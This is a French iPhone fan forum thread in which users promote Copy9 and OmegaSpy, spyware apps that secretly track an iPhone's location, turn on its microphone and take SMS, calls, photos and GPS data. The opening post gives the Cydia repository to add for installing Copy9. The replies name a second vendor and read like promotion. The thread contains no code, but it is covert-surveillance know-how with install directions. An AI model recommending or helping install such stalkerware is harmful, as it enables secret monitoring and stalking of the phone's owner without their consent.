iPhone France Forum
Bienvenue sur iPhone France Forum !
Le Forum iPhone, iPhone 3G et iPod Touch d'Apple.

Rejoignez vous aussi une grande communauté de passionnés !
Enregistrez vous pour profiter des avantages membres.

iPhone France Forum

iPhone, iPhone 3G, iPhone 2, iPhone 3GS, iPhone 4, iPod Touch, iPad et iPad 2 d'Apple : Déblocage, Applications, Jeux, News, Test, Trucs et Astuces, Customisation, AppStore, SDK.
AccueilPortailS'enregistrerConnexion

[Cydia] Traquez n'importe quel iphone avec le logiciel Copy9

Voir le sujet précédent Voir le sujet suivant Aller en bas
Auteur Message
kev12
iPod
iPod

Points iPhone: 435

MessageSujet: [Cydia] Traquez n'importe quel iphone avec le logiciel Copy9 Sam 9 Avr - 1:36

Bonjours à tous!
La nouveau logiciel Copy9 mis en circulation via le site http://www.spytic.fr permet de localiser et activer le micro à distance d'un iphone gratuitement.

Pour l'installer, il faut aller dans Cydia et ajouter la source iphone.spytic.fr

Screenshot du logiciel:

Pour localiser le iphone ou est installer le logiciel, soit vous creer un compte sur le site Spytic ( vous pourrez localiser le téléphone toutes les 5 minutes et retracer le parcours ) soit via l'application TraceYou dispo sur app.store gratuitement

Le lien pour la télécharger sur app.store : http://itunes.apple.com/fr/app/traceyou-lite/id415881335?mt=8

Screenshot du retraçage du parcours du téléphone équipé du logicel:

Screenshot de la localisation en temps réel:

J'éspère que l'appli vous plaira! Smile

Un ptit tuto pour utiliser l'appli TraceYou: http://spyticblog.com/2011/02/24/tutoriel-traceyou/

" A CONSOMMER AVEC MODERATION " ^^

Meilleurs salutations à tous!
Revenir en haut Aller en bas
zzz123
iPod
iPod

Points iPhone: 215

Masculin

MessageSujet: Re: [Cydia] Traquez n'importe quel iphone avec le logiciel Copy9 Mar 1 Nov - 4:15

c'est un défaut de la pomme de sorte que le logiciel peut s'introduire dans l'iPhone et le vol de données. Je viens de tester omegaspy.com. faite m'a surpris. son peut être entendu clairement autour de l'utilisateur ne sait pas, et les données SMS, appels, photos, position GPS, ..., volées secret
source: iphone.omegaspy.com
kev12
iPod
iPod

Points iPhone: 435

MessageSujet: Re: [Cydia] Traquez n'importe quel iphone avec le logiciel Copy9 Ven 13 Jan - 22:16

Copy9 ( application disponible sur www.spytic.fr ) bientot disponible sous iOS5 Very Happy
zzz123
iPod
iPod

Points iPhone: 215

Masculin

MessageSujet: Re: [Cydia] Traquez n'importe quel iphone avec le logiciel Copy9 Jeu 16 Fév - 7:08

Je ne suis pas sûr à ce sujet. Je sais que omegaspy possède un support complet pour les ios 5
( www.omegaspy.com )

[Cydia] Traquez n'importe quel iphone avec le logiciel Copy9

Voir le sujet précédent Voir le sujet suivant Revenir en haut
Page 1 sur 1